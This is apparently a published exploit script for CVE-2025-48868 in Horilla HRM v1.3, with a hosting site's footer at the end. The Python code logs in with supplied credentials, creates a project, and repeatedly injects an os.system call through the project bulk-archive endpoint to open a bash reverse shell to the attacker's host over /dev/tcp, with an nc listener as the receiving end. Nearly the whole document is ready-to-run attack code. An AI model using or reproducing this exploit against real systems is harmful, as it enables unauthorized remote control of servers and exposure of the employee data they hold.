# Exploit Title: Horilla v1.3 - RCE
# Date: 2025-05-29
# Exploit Author: Raghad Abdallah Al-syouf
# Version: <= 1.3
# Tested on: Ubuntu / Docker
# CVE: CVE-2025-48868
Description:
This script exploits the authenticated RCE vulnerability CVE-2025-48868.
It logs into the target web app, creates a project, and sends payloads
to achieve a reverse shell connection to a listener **started manually** by the user.
Usage:
python3 CVE_2025_48868.py --url http[s]://target:port --user username --pass password --lhost YOUR_IP --lport LISTENER_PORT
Example:
python3 CVE_2025_48868.py --url http://127.0.0.1:8000 --user admin --pass admin --lhost 192.168.1.100 --lport 4444
"""
import requests
import time
import sys
import argparse
from bs4 import BeautifulSoup
import urllib3
import random
import string
from datetime import datetime
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def generate_random_title():
letters = ''.join(random.choices(string.ascii_lowercase, k=4))
digits = ''.join(random.choices(string.digits, k=2))
return letters + digits
def main():
print("[+] CVE-2025-48868")
parser = argparse.ArgumentParser(description='Exploit for CVE-2025-48868: Authenticated RCE in Horilla HRM software v1.3. Exploit by:Nakleh Said Zeidan')
parser.add_argument('--url', required=True, help='Target URL, e.g. http://localhost:8000')
parser.add_argument('--user', required=True, help='Username for login')
parser.add_argument('--pass', required=True, dest='password', help='Password for login')
parser.add_argument('--lhost', required=True, help='Attacker IP (listener must be started manually)')
parser.add_argument('--lport', required=True, type=int, help='Attacker port (listener must be started manually)')
args = parser.parse_args()
base_url = args.url.rstrip('/')
login_url = f"{base_url}/login/"
project_url = f"{base_url}/project/project-bulk-archive"
session = requests.Session()
headers = {
"User-Agent": "Mozilla/5.0",
"X-Requested-With": "XMLHttpRequest"
}
print("[+] Getting login page...")
login_page = session.get(login_url, headers=headers, verify=False)
if login_page.status_code != 200:
print(f"[-] Failed to load login page, status {login_page.status_code}")
sys.exit(1)
soup = BeautifulSoup(login_page.text, 'html.parser')
csrf_token = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value']
login_data = {
"username": args.user,
"password": args.password,
"csrfmiddlewaretoken": csrf_token
}
print("[+] Logging in...")
login_resp = session.post(login_url, data=login_data, headers=headers, verify=False)
if login_resp.status_code != 200 or "logout" not in login_resp.text.lower():
print("[-] Login failed")
sys.exit(1)
print("[+] Logged in successfully!")
project_view_url = f"{base_url}/project/project-view/"
project_view = session.get(project_view_url, headers=headers, verify=False)
soup = BeautifulSoup(project_view.text, 'html.parser')
csrf_token = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value']
print("[+] Creating project...")
create_project_url = f"{base_url}/project/create-project?"
today_str = datetime.now().strftime("%Y-%m-%d")
random_title = generate_random_title()
multipart_data = {
"is_active": "on",
"title": random_title,
"managers": "1",
"members": "1",
"status": "new",
"start_date": today_str,
"end_date": today_str,
"description": "Exploit project"
}
create_headers = {
"User-Agent": "Mozilla/5.0",
"Accept": "*/*",
"Referer": project_view_url,
"HX-Request": "true",
"HX-Trigger": "hlvd701Form",
"HX-Target": "hlvd701Form",
"HX-Current-URL": project_view_url,
"X-CSRFToken": csrf_token,
"Origin": base_url,
"DNT": "1",
"Connection": "keep-alive",
}
create_resp = session.post(create_project_url, data=multipart_data, headers=create_headers, verify=False)
if create_resp.status_code == 200:
print(f"[+] Project created successfully with title: {random_title}")
else:
print(f"[-] Project creation may have failed (status {create_resp.status_code}), continuing anyway...")
headers["Referer"] = project_view_url
headers["Origin"] = base_url
headers["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"
print("[*] Ensure your listener is running: `nc -lvnp {}`".format(args.lport))
print("[+] Sending payload...")
i = 1
while True:
encoded_ids = f"%5B%22{i}%22%5D"
payload = f"__import__('os').system('bash+-c+\"bash+-i+>%26+/dev/tcp/{args.lhost}/{args.lport}+0>%261\"')"
exploit_url = f"{project_url}?is_active={payload}"
data = f"csrfmiddlewaretoken={csrf_token}&ids={encoded_ids}"
response = session.post(exploit_url, headers=headers, data=data, verify=False)
if response.status_code == 200:
print(f"[+] Payload sent for project id {i}. Waiting for shell...")
else:
print(f"[-] Error sending payload for project id {i} (status {response.status_code})")
time.sleep(3)
i += 1
if __name__ == "__main__":
main()Credits and Partners
All rights reserved nPulse.net 2009 - 2026
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD
